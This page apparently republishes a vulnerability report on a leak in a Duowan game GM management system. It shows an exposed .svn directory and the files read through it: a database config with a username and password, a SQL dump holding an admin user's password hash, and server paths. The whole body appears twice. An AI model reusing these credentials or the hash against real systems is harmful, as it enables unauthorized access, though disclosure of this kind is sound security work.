欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  后端开发

多玩某GM系统敏感信息泄漏

程序员文章站 2022-06-09 13:07:00
...
首先是svn泄漏,

http://qa.tank.duowan.com/manage/.svn/entries

但是发现svn查看不了什么文件,但是可以知道大概目录,直接访问久暴露了源码http://qa.tank.duowan.com/manage/sql/dbcfg.py

HOST = '127.0.0.1'

USER = 'tkgame'

PAWD = 'tkgame'

PORT = 0

DBNAME = 'tkt_manage'

#

EXECUTETYPE = 'update'

BUILDSQL = 'table_defines.sql'

UPDATELOG = 'update.ini'

UPDATETABLE = '_db_update_log'

BUILDUPDATESQL = '_db_update_log.sql'

BACKUPSQLPREFIX = 'bk_'

http://qa.tank.duowan.com/manage/sql/table_defines.sql

INSERT INTO `user` (`user_id`, `user_name`, `user_password`, `user_level`, `user_created`) VALUES

(1, 'sixcube', '6511383c766f89361b27f1d0d4f25956', 2, 1338946866);

http://qa.tank.duowan.com/manage/i18n/config.sh

ROOT_PATH=/var/www/wwwroot/tkt/manage

I18N_PATH=$ROOT_PATH/i18n

I18N_DOMAIN=tkt_manage

LANG_LIST=(`/usr/bin/php -q getLangList.php`);

LEN_OF_LANG_LIST=${#LANG_LIST[@]}

首先是svn泄漏,

http://qa.tank.duowan.com/manage/.svn/entries

但是发现svn查看不了什么文件,但是可以知道大概目录,直接访问久暴露了源码http://qa.tank.duowan.com/manage/sql/dbcfg.py

HOST = '127.0.0.1'

USER = 'tkgame'

PAWD = 'tkgame'

PORT = 0

DBNAME = 'tkt_manage'

#

EXECUTETYPE = 'update'

BUILDSQL = 'table_defines.sql'

UPDATELOG = 'update.ini'

UPDATETABLE = '_db_update_log'

BUILDUPDATESQL = '_db_update_log.sql'

BACKUPSQLPREFIX = 'bk_'

漏洞证明:

http://qa.tank.duowan.com/manage/sql/table_defines.sql

INSERT INTO `user` (`user_id`, `user_name`, `user_password`, `user_level`, `user_created`) VALUES

(1, 'sixcube', '6511383c766f89361b27f1d0d4f25956', 2, 1338946866);

http://qa.tank.duowan.com/manage/i18n/config.sh

ROOT_PATH=/var/www/wwwroot/tkt/manage

I18N_PATH=$ROOT_PATH/i18n

I18N_DOMAIN=tkt_manage

LANG_LIST=(`/usr/bin/php -q getLangList.php`);

LEN_OF_LANG_LIST=${#LANG_LIST[@]}